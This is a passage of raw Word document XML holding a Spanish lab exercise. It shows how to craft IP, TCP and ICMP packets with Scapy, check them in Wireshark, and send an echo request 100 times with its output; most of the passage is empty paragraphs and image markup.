    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000008C">
      <w:pPr>
        <w:contextualSpacing w:val="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000008D">
      <w:pPr>
        <w:contextualSpacing w:val="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000008E">
      <w:pPr>
        <w:contextualSpacing w:val="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000008F">
      <w:pPr>
        <w:contextualSpacing w:val="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000090">
      <w:pPr>
        <w:contextualSpacing w:val="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000091">
      <w:pPr>
        <w:contextualSpacing w:val="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000092">
      <w:pPr>
        <w:contextualSpacing w:val="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000093">
      <w:pPr>
        <w:contextualSpacing w:val="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000094">
      <w:pPr>
        <w:contextualSpacing w:val="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000095">
      <w:pPr>
        <w:contextualSpacing w:val="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000096">
      <w:pPr>
        <w:contextualSpacing w:val="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000097">
      <w:pPr>
        <w:contextualSpacing w:val="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000098">
      <w:pPr>
        <w:contextualSpacing w:val="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="1362075" cy="295275"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="23" name="image54.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image54.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId22"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="1362075" cy="295275"/>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contextualSpacing w:val="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000009A">
      <w:pPr>
        <w:contextualSpacing w:val="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000009B">
      <w:pPr>
        <w:contextualSpacing w:val="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="3200400" cy="2328863"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="22" name="image53.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image53.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId23"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3200400" cy="2328863"/>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contextualSpacing w:val="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000009D">
      <w:pPr>
        <w:contextualSpacing w:val="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">En el paso anterior hemos montado un paquete IP pero este no se puede enviar a ningún host ya que no cumple con el “stat” del protocolo en este caso nos falta indicar los números de puerto y el estado del “flag”.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000009E">
      <w:pPr>
        <w:contextualSpacing w:val="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Ahora procedemos a montar un paquete TCP.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000009F">
      <w:pPr>
        <w:contextualSpacing w:val="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000A0">
      <w:pPr>
        <w:contextualSpacing w:val="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Ahora intentaremos crear un paquete ICMP de tipo “echo request” encapsularlo y lo enviamos comprobaremos con wireshark que a funcionado correctamente.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000A1">
      <w:pPr>
        <w:contextualSpacing w:val="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000A2">
      <w:pPr>
        <w:contextualSpacing w:val="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="2119313" cy="3286125"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="29" name="image60.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image60.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId24"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2119313" cy="3286125"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="6010275" cy="300038"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="30" name="image61.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image61.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId25"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6010275" cy="300038"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000A3">
      <w:pPr>
        <w:contextualSpacing w:val="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000A4">
      <w:pPr>
        <w:contextualSpacing w:val="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000A5">
      <w:pPr>
        <w:contextualSpacing w:val="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Como hemos comprobado la encapsulación de paquete ICMP no es exactamente igual que un paquete de tipo IP/TCP, en este caso primero hemos creado un paquete IP después un paquete ICMP y después hemos encapsulado, comprobando con el “Wireshark” a funcionado correctamente.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000A6">
      <w:pPr>
        <w:contextualSpacing w:val="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Ahora enviaremos 100 veces este paquete con la instrucción “Send”.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000A7">
      <w:pPr>
        <w:contextualSpacing w:val="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000A8">
      <w:pPr>
        <w:contextualSpacing w:val="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5734050" cy="368300"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="19" name="image50.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image50.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId26"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5734050" cy="368300"/>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contextualSpacing w:val="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000AA">
      <w:pPr>
        <w:contextualSpacing w:val="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5734050" cy="1765300"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="3" name="image24.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image24.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId27"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5734050" cy="1765300"/>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contextualSpacing w:val="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000AC">
      <w:pPr>
        <w:contextualSpacing w:val="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Para visualizar las respuestas de los envíos podemos utilizar el “sr” en vez de el “send”. Una vez enviamos nuestro paquete con “sr” somos capaces de ver la respuesta con el comando “summary” pero previamente hay que habilitar las respuesta y las no respuestas con esta instrucción: </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000AD">
      <w:pPr>
        <w:contextualSpacing w:val="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000AE">
      <w:pPr>
        <w:contextualSpacing w:val="0"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:i w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">&gt;&gt;&gt; sr([mipaquete2]*100)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000AF">
      <w:pPr>
        <w:contextualSpacing w:val="0"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:i w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Begin emission:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000B0">
      <w:pPr>
        <w:contextualSpacing w:val="0"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:i w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">.************************************************************************.***************************Finished to send 100 packets.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000B1">
      <w:pPr>
        <w:contextualSpacing w:val="0"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:i w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">*</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000B2">
      <w:pPr>
        <w:contextualSpacing w:val="0"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:i w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Received 102 packets, got 100 answers, remaining 0 packets</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000B3">
      <w:pPr>
        <w:contextualSpacing w:val="0"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:i w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">(&lt;Results: TCP:0 UDP:0 ICMP:100 Other:0&gt;, &lt;Unanswered: TCP:0 UDP:0 ICMP:0 Other:0&gt;)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000B4">
      <w:pPr>
        <w:contextualSpacing w:val="0"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:i w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000B5">
      <w:pPr>
        <w:contextualSpacing w:val="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000B6">
      <w:pPr>
        <w:contextualSpacing w:val="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000B7">
      <w:pPr>
        <w:contextualSpacing w:val="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000B8">
      <w:pPr>
        <w:contextualSpacing w:val="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000B9">
      <w:pPr>
        <w:contextualSpacing w:val="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000BA">
      <w:pPr>
        <w:contextualSpacing w:val="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000BB">
      <w:pPr>
        <w:contextualSpacing w:val="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000BC">
      <w:pPr>
        <w:contextualSpacing w:val="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000BD">
      <w:pPr>
        <w:contextualSpacing w:val="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000BE">
      <w:pPr>
        <w:contextualSpacing w:val="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000BF">
      <w:pPr>
        <w:contextualSpacing w:val="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000C0">
      <w:pPr>
        <w:contextualSpacing w:val="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
